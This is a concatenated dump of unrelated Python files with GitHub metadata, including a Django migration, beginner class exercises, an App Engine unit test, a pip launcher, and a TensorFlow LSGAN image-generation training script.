| 30,116,621
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
__author__ = 'Yifu Huang'
from src.azureformation.azureoperation.service import Service
class Pao():
def __init__(self, a, b, c):
self.a = a
self.b = b
self.c = c
def funcA(self):
print Service.__module__
print Service.__name__
print Service.add_virtual_machine.__name__
def funcB(self):
print 'funcB'
Pao(1, 2, 3).funcA()
|
[
"ifhuang91@gmail.com"
] |
ifhuang91@gmail.com
|
a467d308b3b97fee6e055f6835df889fd0257c31
|
3f63371bf7cdf4e8f875a90fdf4967674bb0766e
|
/NewsPaper/NewsPaper/news/migrations/0001_initial.py
|
5f600f56afecfec31b3d1cb8337889497b2e62bb
|
[] |
no_license
|
Wistick/homeworks_skillfactory
|
c94a425b765a826d845bf428a17a8ded276790a4
|
652e1553d38e53b2a86a7c000462b624112d72d9
|
refs/heads/main
| 2023-05-03T15:07:08.104767
| 2021-05-14T14:14:10
| 2021-05-14T14:14:10
| 315,729,263
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,300
|
py
|
# Generated by Django 3.1.7 on 2021-03-31 13:58
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author_rating', models.IntegerField(default=0)),
('author_user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category_name', models.CharField(max_length=60, unique=True)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_field', models.CharField(choices=[('AR', 'Статья'), ('NE', 'Новость')], default='NE', max_length=2)),
('time_created', models.DateTimeField(auto_now_add=True, verbose_name='Дата публикации')),
('title', models.CharField(max_length=255, verbose_name='Заголовок')),
('text', models.TextField(verbose_name='Напишите сюда свой текст вашей статьи')),
('post_rating', models.IntegerField(default=0, verbose_name='Рейтинг')),
('post_author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='news.author', verbose_name='Автор')),
],
),
migrations.CreateModel(
name='PostCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='news.category')),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='news.post')),
],
),
migrations.AddField(
model_name='post',
name='post_category',
field=models.ManyToManyField(through='news.PostCategory', to='news.Category'),
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('time_created', models.DateTimeField(auto_now_add=True)),
('comment_rating', models.IntegerField(default=0)),
('comment_author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('comment_post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='news.post')),
],
),
]
|
[
"vadim.ska8@yandex.ru"
] |
vadim.ska8@yandex.ru
|
2bf364eb9a7d7b7ff5c59dd4ab1318f9930c17a8
|
067b8f7180d15375a593163b44952b82544914f5
|
/其他python/aaa.py
|
3dc45608ab790574222e200a3f17017dd74dcdf8
|
[] |
no_license
|
WenRich666/learn-note
|
fb0bfdfcddba78ccb6d35837ed2c59421907b70e
|
d4a344396380cefd9391baede824acabc916e507
|
refs/heads/master
| 2020-04-13T05:36:36.505613
| 2019-01-21T08:37:20
| 2019-01-21T08:37:20
| 162,996,885
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,087
|
py
|
# a = input("告诉我一个数字")
# b = input("告诉我另一个数字")
#
# def add(a,b):
# while True:
# a = input("告诉我一个数字")
# a = int(a)
# b = input("告诉我另一个数字")
# b = int(b)
#
# c = (a + b) * b/2
# print(c)
#
# while a == "q":
# break
#
# add(0,0)
#
# def add():
# while True:
# a = input("输入数字 a:")
# if a == "q":
# break
# b = input("输入数字 b:")
# if b == "q":
# break
#
# result = 0
#
# for i in range(int(a),int(b) + 1):
# result += str(a) + str(b)
#
# print(result)
#
# add()
class Student():
sum = 0
def __init__(self,name,age,gender,score):
self.name = name
self.age = age
self.gender = gender
self.score = score
if self.gender == "male":
print("\nHis name is " + self.name.title() + ",his age is " + str(self.age) +
",his gender is " + self.gender + ",his score is " + str(self.score) + ".")
elif self.gender == "female":
print("\nHer name is " + self.name.title() + ",her age is " + str(self.age) +
",her gender is " + self.gender + ",her score is " + str(self.score) + ".")
def examination(self):
if self.score >= 80:
print("excellent")
if 60 < self.score < 80 :
print("pass")
if self.score <= 60:
print("fail")
@classmethod
def plus_sum(cls):
cls.sum += 1
# print(cls.sum)
print("当前班级人数为:" + str(cls.sum))
student1 = Student("john",17,"male",78)
student1.examination()
Student.plus_sum()
student2 = Student("mary",16,"female",92)
student2.examination()
Student.plus_sum()
student3 = Student("bob",21,"male",43)
student3.examination()
Student.plus_sum()
student4 = Student("kate",18,"female",63)
student4.examination()
Student.plus_sum()
student5 = Student("catherine",15,"male",88)
student5.examination()
Student.plus_sum()
|
[
"940031354@qq.com"
] |
940031354@qq.com
|
55b6489b980ed4ad7ed831baf64d907a917f24c4
|
cb5abbab5007a40f488c0022da91014959885a7b
|
/tests/test_appengine_api.py
|
be29069de30a79da634abf37359adaba6fbccb81
|
[] |
no_license
|
ryangavin/stevens_hackny2011
|
e6cc9e823db6510b70a21f0197cdd7da2fd1a4c6
|
f3b09daa9b40626099559445826de8d535a1b086
|
refs/heads/master
| 2021-01-01T06:50:31.110394
| 2011-04-10T15:47:40
| 2011-04-10T15:47:40
| 1,592,213
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
"""Additional sample test file that will run along with app_tests.py"""
import unittest
from google.appengine.ext import testbed
from google.appengine.api import urlfetch
class AppEngineAPITest(unittest.TestCase):
def setUp(self):
# First, create an instance of the Testbed class.
self.testbed = testbed.Testbed()
# Then activate the testbed, which prepares the service stubs for use.
self.testbed.activate()
# Initialize urlfetch stub.
self.testbed.init_urlfetch_stub()
def tearDown(self):
self.testbed.deactivate()
def test_urlfetch(self):
response = urlfetch.fetch('http://www.google.com')
self.assertTrue(response.content.find('<html>'))
|
[
"ajshulman@gmail.com"
] |
ajshulman@gmail.com
|
7930e93940a91400b229d171cfdc37c5ed30cf8d
|
f19cdf33828cd0c0b35d07762213ac89811806fe
|
/py_37_env/bin/pip3.7
|
a75cae7e00096766c1b8cf0f61a7f79bcdbd4410
|
[] |
no_license
|
gdvorakova/whats-cooking
|
4c7c32348e2c56e8b6bb2db12edafba8b4d02f59
|
de05173d9bfc3f67cd8991573765e13af5fd302f
|
refs/heads/master
| 2022-11-14T15:34:21.239912
| 2022-04-16T10:35:19
| 2022-04-16T10:35:19
| 185,632,177
| 1
| 1
| null | 2022-10-27T14:49:31
| 2019-05-08T15:22:47
|
Python
|
UTF-8
|
Python
| false
| false
| 281
|
7
|
#!/Users/gabrieladvorakova/School/Data_mining/whats-cooking/py_37_env/bin/python3.7
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"gabdvorakova@gmail.com"
] |
gabdvorakova@gmail.com
|
f6aa5a31dad49fc2d24535d0b476a474e66caa93
|
818afee23371db486b3736e40861dbd8a4bdbccf
|
/python_work/Chapter 2/2-9.py
|
7d80db9ae7a25e354d6f02ac037e3b657fe5c8b9
|
[] |
no_license
|
BW1ll/PythonCrashCourse
|
c12a3da029652ac7eac827de040f95f9216c0967
|
8ac53cf439bc55896e8f5a6d7f52f60a6cb34ceb
|
refs/heads/master
| 2022-12-27T19:46:13.905195
| 2020-09-28T13:15:25
| 2020-09-28T13:15:25
| 297,403,097
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 67
|
py
|
fav_numb = 21
print("My favorit number is " + str(fav_numb) + ".")
|
[
"noreply@github.com"
] |
BW1ll.noreply@github.com
|
231f213e52df80c3e39913394ea56558f1802acb
|
c47466490b41101de7cf299eb0ab38564a2f2242
|
/build/racecar_base_public/planning_utils/catkin_generated/pkg.develspace.context.pc.py
|
70aa7290238b0e7241b7931e3d8dd69eddd21e8e
|
[] |
no_license
|
kleist27/FinalProject_545
|
b1beffb10ad2bc6ece76ec17afe163e5e718f8fb
|
5be47eb0b3989e581869fa0fe7a4490e6ea6a323
|
refs/heads/master
| 2020-04-08T05:42:12.293288
| 2018-12-10T03:53:03
| 2018-12-10T03:53:03
| 159,070,418
| 1
| 0
| null | 2018-12-10T03:54:04
| 2018-11-25T20:13:51
|
Makefile
|
UTF-8
|
Python
| false
| false
| 385
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "planning_utils"
PROJECT_SPACE_DIR = "/home/car-user/FinalProject_545/devel"
PROJECT_VERSION = "0.0.0"
|
[
"dylankleist@gmail.com"
] |
dylankleist@gmail.com
|
d47558441774fb9ace9df0ced14340f028f372ab
|
358d22334e78eee7ae94abebdbd341a622f31add
|
/amazon interview experience/amazon hydrabad benguluru problem.py
|
76aee1173d475957600b67a21b01379b2b950867
|
[] |
no_license
|
mihir6598/python_competitive
|
9ad1faa9c4ff50c50a8c82d7b2b20c3ed7f4f582
|
135b2c28d7200bbe7bfd2244fd17e34d9a08bdd6
|
refs/heads/main
| 2023-07-05T01:59:22.007318
| 2021-08-03T13:33:43
| 2021-08-03T13:33:43
| 339,310,299
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
def solveutil(arr,i,h,b,n,ans):
if h<n/2 and b<n/2:
ans += min(arr[i][0] + solveutil(arr,i+1,h+1,b,n,ans),arr[i][1] + solveutil(arr,i+1,h,b+1,n,ans))
elif b<n/2:
ans += arr[i][1] + solveutil(arr,i+1,h,b+1,n,ans)
elif h<n/2:
ans += arr[i][0] + solveutil(arr,i+1,h+1,b,n,ans)
return ans
def solve2(arr):
arr.sort(key=lambda x : max(x[0],x[1]),reverse=True)
print (arr)
h = 0
b = 0
n = len(arr)
ans = 0
for i in arr:
if h<n/2 and b<n/2:
if i[0]>i[1]:
ans = ans + i[1]
b += 1
else:
ans = ans + i[0]
h += 1
elif h<n/2:
ans = ans + i[0]
h += 1
elif b<n/2:
ans = ans + i[1]
b += 1
return ans
def solve(arr):
n = len(arr)
ans = 0
i = 0
h = 0
b = 0
print (solveutil(arr,i,h,b,n,ans))
print (solve2(arr))
if __name__ == "__main__":
arr = [ [100,90], [90,80], [80,70], [60,1],[4,2], [5,3]]
solve(arr)
|
[
"mihirpatel6598@gmail.com"
] |
mihirpatel6598@gmail.com
|
b33c3549762293ea977ceb562ae38ec34716f32f
|
73bc2d190b8bc3c3b4e03c4e06e850caf2d44a58
|
/train_LSGAN.py
|
39ab3bc688e23555b46d35b8e40445c9c1bf67d7
|
[
"MIT"
] |
permissive
|
masataka46/demo_LSGAN_TF
|
ee0c35cc9fcc72b15a667005a32aa836bb71d242
|
c021acdd8024214a7afc47689aa57c5680da5906
|
refs/heads/master
| 2020-03-23T06:36:04.571225
| 2018-07-17T02:45:47
| 2018-07-17T02:45:47
| 141,218,424
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,136
|
py
|
import numpy as np
import os
import tensorflow as tf
from PIL import Image
import utility as Utility
import argparse
from make_datasets_food101 import Make_datasets_food101
def parser():
parser = argparse.ArgumentParser(description='train LSGAN')
parser.add_argument('--batch_size', '-b', type=int, default=20, help='Number of images in each mini-batch')
parser.add_argument('--log_file_name', '-lf', type=str, default='log180716', help='log file name')
parser.add_argument('--epoch', '-e', type=int, default=1000, help='epoch')
parser.add_argument('--dir_name', '-dn', type=str, default='PATH/TO/DATASETS',
help='directory name of real data')
return parser.parse_args()
args = parser()
#global variants
BATCH_SIZE = args.batch_size
LOGFILE_NAME = args.log_file_name
EPOCH = args.epoch
DIR_NAME = args.dir_name
IMG_WIDTH = 64
IMG_HEIGHT = 64
NOISE_UNIT_NUM = 100
NOISE_MEAN = 0.0
NOISE_STDDEV = 1.0
TEST_DATA_SAMPLE = 5 * 5
L2_NORM = 0.001
KEEP_PROB_RATE = 0.5
SEED = 1234
np.random.seed(seed=SEED)
BOARD_DIR_NAME = './tensorboard/' + LOGFILE_NAME
out_image_dir = './out_images_LSGAN' #output image file
out_model_dir = './out_models_LSGAN' #output model file
try:
os.mkdir(out_image_dir)
os.mkdir(out_model_dir)
os.mkdir('./out_images_Debug') #for debug
except:
pass
make_datasets = Make_datasets_food101(DIR_NAME, IMG_WIDTH, IMG_HEIGHT, SEED, NOISE_MEAN, NOISE_STDDEV, TEST_DATA_SAMPLE,
NOISE_UNIT_NUM)
def leaky_relu(x, alpha):
return tf.nn.relu(x) - alpha * tf.nn.relu(-x)
def gaussian_noise(input, std): #used at discriminator
noise = tf.random_normal(shape=tf.shape(input), mean=0.0, stddev=std, dtype=tf.float32, seed=SEED)
return input + noise
#generator------------------------------------------------------------------
def generator(z, reuse=False):
with tf.variable_scope('generator', reuse=reuse):
with tf.name_scope("G_layer1"): #layer1 linear
wg1 = tf.get_variable('wg1', [NOISE_UNIT_NUM, 512 * 4 * 4], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bg1 = tf.get_variable('bg1', [512 * 4 * 4], initializer=tf.constant_initializer(0.0))
scaleg1 = tf.get_variable('sg1', [512 * 4 * 4], initializer=tf.constant_initializer(1.0))
betag1 = tf.get_variable('beg1', [512 * 4 * 4], initializer=tf.constant_initializer(0.0))
fc1 = tf.matmul(z, wg1, name='G_fc1') + bg1
#batch normalization
batch_mean1, batch_var1 = tf.nn.moments(fc1, [0])
bn1 = tf.nn.batch_normalization(fc1, batch_mean1, batch_var1, betag1, scaleg1 , 0.0001, name='G_BN1')
#leaky relu
lR1 = leaky_relu(bn1, alpha=0.2)
#reshape nx4x4x512 -> [n, 4, 4, 512]
re1 = tf.reshape(lR1, [-1, 4, 4, 512])
with tf.name_scope("G_layer2"):
#layer2 4x4x512 -> 8x8x256
wg2 = tf.get_variable('wg2', [4, 4, 256, 512], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bg2 = tf.get_variable('bg2', [256], initializer=tf.constant_initializer(0.0))
scaleg2 = tf.get_variable('sg2', [256], initializer=tf.constant_initializer(1.0))
betag2 = tf.get_variable('beg2', [256], initializer=tf.constant_initializer(0.0))
output_shape2 = tf.stack(
[tf.shape(re1)[0], tf.shape(re1)[1] * 2, tf.shape(re1)[2] * 2, tf.div(tf.shape(re1)[3], tf.constant(2))])
deconv2 = tf.nn.conv2d_transpose(re1, wg2, output_shape=output_shape2, strides=[1, 2, 2, 1],
padding="SAME") + bg2
# batch normalization
batch_mean2, batch_var2 = tf.nn.moments(deconv2, [0, 1, 2])
bn2 = tf.nn.batch_normalization(deconv2, batch_mean2, batch_var2, betag2, scaleg2, 0.0001, name='G_BN2')
# leaky relu
lR2 = leaky_relu(bn2, alpha=0.2)
with tf.name_scope("G_layer3"): # layer3 8x8x256 -> 16x16x128
wg3 = tf.get_variable('wg3', [4, 4, 128, 256], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bg3 = tf.get_variable('bg3', [128], initializer=tf.constant_initializer(0.0))
scaleg3 = tf.get_variable('sg3', [128], initializer=tf.constant_initializer(1.0))
betag3 = tf.get_variable('beg3', [128], initializer=tf.constant_initializer(0.0))
output_shape3 = tf.stack(
[tf.shape(lR2)[0], tf.shape(lR2)[1] * 2, tf.shape(lR2)[2] * 2, tf.div(tf.shape(lR2)[3], tf.constant(2))])
deconv3 = tf.nn.conv2d_transpose(lR2, wg3, output_shape=output_shape3, strides=[1, 2, 2, 1],
padding="SAME") + bg3
# batch normalization
batch_mean3, batch_var3 = tf.nn.moments(deconv3, [0, 1, 2])
bn3 = tf.nn.batch_normalization(deconv3, batch_mean3, batch_var3, betag3, scaleg3, 0.0001, name='G_BN3')
# leaky relu
lR3 = leaky_relu(bn3, alpha=0.2)
with tf.name_scope("G_layer4"): # layer4 16x16x128 -> 32x32x64
wg4 = tf.get_variable('wg4', [4, 4, 64, 128], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bg4 = tf.get_variable('bg4', [64], initializer=tf.constant_initializer(0.0))
scaleg4 = tf.get_variable('sg4', [64], initializer=tf.constant_initializer(1.0))
betag4 = tf.get_variable('beg4', [64], initializer=tf.constant_initializer(0.0))
output_shape4 = tf.stack(
# [tf.shape(lR3)[0], tf.shape(lR3)[1], tf.shape(lR3)[2], tf.shape(lR3)[3]])
[tf.shape(lR3)[0], tf.shape(lR3)[1] * 2, tf.shape(lR3)[2] * 2, tf.div(tf.shape(lR3)[3], tf.constant(2))])
deconv4 = tf.nn.conv2d_transpose(lR3, wg4, output_shape=output_shape4, strides=[1, 2, 2, 1],
padding="SAME") + bg4
# batch normalization
batch_mean4, batch_var4 = tf.nn.moments(deconv4, [0, 1, 2])
bn4 = tf.nn.batch_normalization(deconv4, batch_mean4, batch_var4, betag4, scaleg4, 0.0001, name='G_BN4')
# leaky relu
lR4 = leaky_relu(bn4, alpha=0.2)
with tf.name_scope("G_layer5"): # layer5 32x32x648 -> 64x64x3
wg5 = tf.get_variable('wg5', [4, 4, 3, 64], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bg5 = tf.get_variable('bg5', [3], initializer=tf.constant_initializer(0.0))
output_shape5 = tf.stack(
[tf.shape(lR4)[0], tf.shape(lR4)[1] * 2, tf.shape(lR4)[2] * 2, tf.constant(3)])
deconv5 = tf.nn.conv2d_transpose(lR4, wg5, output_shape=output_shape5, strides=[1, 2, 2, 1],
padding="SAME") + bg5
# tanh
tanh5 = tf.nn.tanh(deconv5)
return tanh5
#discriminator-----------------------------------------------------------------
def discriminator(x, reuse=False):
with tf.variable_scope('discriminator', reuse=reuse):
with tf.name_scope("D_layer1"): # layer1 conv1
wd1 = tf.get_variable('wd1', [3, 3, 3, 32], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bd1 = tf.get_variable('bd1', [32], initializer=tf.constant_initializer(0.0))
scaled1 = tf.get_variable('sd1', [32], initializer=tf.constant_initializer(1.0))
betad1 = tf.get_variable('bed1', [32], initializer=tf.constant_initializer(0.0))
conv1 = tf.nn.conv2d(x, wd1, strides=[1, 1, 1, 1], padding="SAME", name='D_conv1') + bd1
# batch normalization
batch_mean1, batch_var1 = tf.nn.moments(conv1, [0, 1, 2])
bn1 = tf.nn.batch_normalization(conv1, batch_mean1, batch_var1, betad1, scaled1, 0.0001, name='D_BN1')
#gaussian noise
gn1 = gaussian_noise(bn1, 0.3)
# leakyReLU function
lr1 = leaky_relu(gn1, alpha=0.2)
with tf.name_scope("D_layer2"): # layer2 conv2
wd2 = tf.get_variable('wd2', [4, 4, 32, 64], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bd2 = tf.get_variable('bd2', [64], initializer=tf.constant_initializer(0.0))
scaled2 = tf.get_variable('sd2', [64], initializer=tf.constant_initializer(1.0))
betad2 = tf.get_variable('bed2', [64], initializer=tf.constant_initializer(0.0))
conv2 = tf.nn.conv2d(lr1, wd2, strides=[1, 2, 2, 1], padding="SAME", name='D_conv2') + bd2
# batch normalization
batch_mean2, batch_var2 = tf.nn.moments(conv2, [0, 1, 2])
bn2 = tf.nn.batch_normalization(conv2, batch_mean2, batch_var2, betad2, scaled2, 0.0001, name='D_BN2')
#gaussian noise
gn2 = gaussian_noise(bn2, 0.3)
# leakyReLU function
lr2 = leaky_relu(gn2, alpha=0.2)
with tf.name_scope("D_layer3"): # layer3 conv3
wd3 = tf.get_variable('wd3', [4, 4, 64, 128], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bd3 = tf.get_variable('bd3', [128], initializer=tf.constant_initializer(0.0))
scaled3 = tf.get_variable('sd3', [128], initializer=tf.constant_initializer(1.0))
betad3 = tf.get_variable('bed3', [128], initializer=tf.constant_initializer(0.0))
conv3 = tf.nn.conv2d(lr2, wd3, strides=[1, 2, 2, 1], padding="SAME", name='D_conv3') + bd3
# batch normalization
batch_mean3, batch_var3 = tf.nn.moments(conv3, [0, 1, 2])
bn3 = tf.nn.batch_normalization(conv3, batch_mean3, batch_var3, betad3, scaled3, 0.0001, name='D_BN3')
# gaussian noise
gn3 = gaussian_noise(bn3, 0.3)
# leakyReLU function
lr3 = leaky_relu(gn3, alpha=0.2)
with tf.name_scope("D_layer4"): # layer4 conv4
wd4 = tf.get_variable('wd4', [4, 4, 128, 256], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bd4 = tf.get_variable('bd4', [256], initializer=tf.constant_initializer(0.0))
scaled4 = tf.get_variable('sd4', [256], initializer=tf.constant_initializer(1.0))
betad4 = tf.get_variable('bed4', [256], initializer=tf.constant_initializer(0.0))
conv4 = tf.nn.conv2d(lr3, wd4, strides=[1, 2, 2, 1], padding="SAME", name='D_conv4') + bd4
# batch normalization
batch_mean4, batch_var4 = tf.nn.moments(conv4, [0, 1, 2])
bn4 = tf.nn.batch_normalization(conv4, batch_mean4, batch_var4, betad4, scaled4, 0.0001, name='D_BN4')
# gaussian noise
gn4 = gaussian_noise(bn4, 0.3)
# leakyReLU function
lr4 = leaky_relu(gn4, alpha=0.2)
with tf.name_scope("D_layer5"): # layer5 conv5
wd5 = tf.get_variable('wd5', [4, 4, 256, 512], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bd5 = tf.get_variable('bd5', [512], initializer=tf.constant_initializer(0.0))
scaled5 = tf.get_variable('sd5', [512], initializer=tf.constant_initializer(1.0))
betad5 = tf.get_variable('bed5', [512], initializer=tf.constant_initializer(0.0))
conv5 = tf.nn.conv2d(lr4, wd5, strides=[1, 2, 2, 1], padding="SAME", name='D_conv5') + bd5
# batch normalization
batch_mean5, batch_var5 = tf.nn.moments(conv5, [0, 1, 2])
bn5 = tf.nn.batch_normalization(conv5, batch_mean5, batch_var5, betad5, scaled5, 0.0001, name='D_BN5')
# gaussian noise
gn5 = gaussian_noise(bn5, 0.3)
# leakyReLU function
lr5 = leaky_relu(gn5, alpha=0.2)
# reshape [n, 4, 4, 512] -> nx4x4x512
re5 = tf.reshape(lr5, [-1, 4 * 4 * 512])
with tf.name_scope("D_layer6"): # layer6 linear
wd6 = tf.get_variable('wd6', [512 * 4 * 4, 1], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bd6 = tf.get_variable('bd6', [1], initializer=tf.constant_initializer(0.0))
fc6 = tf.matmul(re5, wd6, name='G_fc6') + bd6
# norm_L2 = tf.nn.l2_loss(wd1) + tf.nn.l2_loss(wd2) + tf.nn.l2_loss(wd3) + tf.nn.l2_loss(wd4) + tf.nn.l2_loss(wd5) \
# + tf.nn.l2_loss(wd6)
# return out_dis, norm_L2
return fc6
z_ = tf.placeholder(tf.float32, [None, NOISE_UNIT_NUM], name='z_') #noise to generator
x_ = tf.placeholder(tf.float32, [None, 64, 64, 3], name='x_') #image to classifier
d_dis_g_ = tf.placeholder(tf.float32, [None, 1], name='d_dis_g_') #target of discriminator related to generator
d_dis_r_ = tf.placeholder(tf.float32, [None, 1], name='d_dis_r_') #target of discriminator related to real image
# stream around generator
x_gen = generator(z_, reuse=False)
#stream around discriminator
out_dis_g = discriminator(x_gen, reuse=False) #from generator
out_dis_r = discriminator(x_, reuse=True) #real image
with tf.name_scope("loss"):
loss_dis_g = tf.reduce_mean(tf.square(out_dis_g - d_dis_g_), name='Loss_dis_gen') #loss related to generator
loss_dis_r = tf.reduce_mean(tf.square(out_dis_r - d_dis_r_), name='Loss_dis_rea') #loss related to real imaeg
#total loss of discriminator
loss_dis_total = loss_dis_g + loss_dis_r
#total loss of generator
loss_gen_total = loss_dis_g * 2.0
tf.summary.scalar('loss_dis_total', loss_dis_total)
tf.summary.scalar('loss_gen_total', loss_gen_total)
merged = tf.summary.merge_all()
# t_vars = tf.trainable_variables()
g_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="generator")
d_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="discriminator")
with tf.name_scope("train"):
train_dis = tf.train.AdamOptimizer(learning_rate=0.0001, beta1=0.5).minimize(loss_dis_total, var_list=d_vars
# var_list=[wd1, wd2, wd3, wd4, wd5, wd6, bd1, bd2, bd3, bd4, bd5, bd6]
, name='Adam_dis')
train_gen = tf.train.AdamOptimizer(learning_rate=0.0001, beta1=0.5).minimize(loss_gen_total, var_list=g_vars
# var_list=[wg1, wg3, wg5, bg1, bg3, bg5, betag2, scaleg2, betag4, scaleg4]
, name='Adam_gen')
sess = tf.Session()
sess.run(tf.global_variables_initializer())
summary_writer = tf.summary.FileWriter(BOARD_DIR_NAME, sess.graph)
#training loop
for epoch in range(0, EPOCH):
sum_loss_gen = np.float32(0)
sum_loss_dis = np.float32(0)
sum_loss_dis_r = np.float32(0)
sum_loss_dis_g = np.float32(0)
len_data = make_datasets.make_data_for_1_epoch()
for i in range(0, len_data, BATCH_SIZE):
img_batch = make_datasets.get_data_for_1_batch(i, BATCH_SIZE)
z = make_datasets.make_random_z_with_norm(NOISE_MEAN, NOISE_STDDEV, len(img_batch), NOISE_UNIT_NUM)
tar_g_1 = make_datasets.make_target_1_0(1.0, len(img_batch))
tar_g_0 = make_datasets.make_target_1_0(0.0, len(img_batch))
#train discriminator
sess.run(train_dis, feed_dict={z_:z, x_: img_batch, d_dis_g_: tar_g_0, d_dis_r_: tar_g_1})
#train generator
sess.run(train_gen, feed_dict={z_:z, d_dis_g_: tar_g_1})
loss_gen_total_ = sess.run(loss_gen_total, feed_dict={z_: z, d_dis_g_: tar_g_1})
loss_dis_total_, loss_dis_r_, loss_dis_g_ = sess.run([loss_dis_total, loss_dis_r, loss_dis_g],
feed_dict={z_:z, x_: img_batch, d_dis_g_: tar_g_0, d_dis_r_: tar_g_1})
#for tensorboard
merged_ = sess.run(merged, feed_dict={z_:z, x_: img_batch, d_dis_g_: tar_g_0, d_dis_r_: tar_g_1})
summary_writer.add_summary(merged_, epoch)
sum_loss_gen += loss_gen_total_
sum_loss_dis += loss_dis_total_
sum_loss_dis_r += loss_dis_r_
sum_loss_dis_g += loss_dis_g_
print("----------------------------------------------------------------------")
print("epoch = {:}, Generator Total Loss = {:.4f}, Discriminator Total Loss = {:.4f}".format(
epoch, sum_loss_gen / len_data, sum_loss_dis / len_data))
print("Discriminator Real Loss = {:.4f}, Discriminator Generated Loss = {:.4f}".format(
sum_loss_dis_r / len_data, sum_loss_dis_g / len_data))
if epoch % 10 == 0:
z_test = make_datasets.initial_noise
gen_images = sess.run(x_gen, feed_dict={z_:z_test})
Utility.make_output_img(gen_images, int(TEST_DATA_SAMPLE ** 0.5) ,out_image_dir, epoch, LOGFILE_NAME)
|
[
"takamitsu.ohmasa@automagi.jp"
] |
takamitsu.ohmasa@automagi.jp
|
a052fe4863ca0a8bd3eadc1ce067c0397d7da66a
|
f2a7d668a3c359f86b07f23d5beba5cb6a0bb5f4
|
/Beginner/numberMirror.py
|
0354fbc1708a92545c7aac6a2506a522dad3e976
|
[] |
no_license
|
deblina23/CodeChef
|
cbe4280ebec446685bfb0a3ea3322214126297b3
|
ceaca18defb7556c29e243c6b6ec736f663f3e56
|
refs/heads/master
| 2023-03-10T21:31:27.995069
| 2021-02-25T21:38:37
| 2021-02-25T21:38:37
| 336,050,803
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
#!/usr/bin/env python3
def readNumber():
number = int(input())
return(number)
def checkRange(number):
if (number>=0 and number<=pow(10,5)):
return(True)
def printNumber(number):
if(checkRange):
print(number)
if __name__ == "__main__":
number = readNumber()
print(number)
|
[
"deblina.ghosh.kolkata@gmail.com"
] |
deblina.ghosh.kolkata@gmail.com
|
5c4f8cbe73ec084c1608b7821080c56ba3a202b3
|
eb3683f9127befb9ef96d8eb801206cf7b84d6a7
|
/stypy/sgmc/sgmc_cache/taxonomy/builtin_functions/chr/error_chr_return_type.py
|
6c0680a7395028a90a275f021b42741f3f8bd809
|
[] |
no_license
|
ComputationalReflection/stypy
|
61ec27333a12f76ac055d13f8969d3e0de172f88
|
be66ae846c82ac40ba7b48f9880d6e3990681a5b
|
refs/heads/master
| 2021-05-13T18:24:29.005894
| 2018-06-14T15:42:50
| 2018-06-14T15:42:50
| 116,855,812
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,903
|
py
|
# -*- coding: utf-8 -*-
"""
ORIGINAL PROGRAM SOURCE CODE:
1: # coding=utf-8
2: __doc__ = "chr builtin is invoked and its return type is used to call an non existing method"
3:
4: if __name__ == '__main__':
5: # Call options
6: # (Integer) -> <type 'str'>
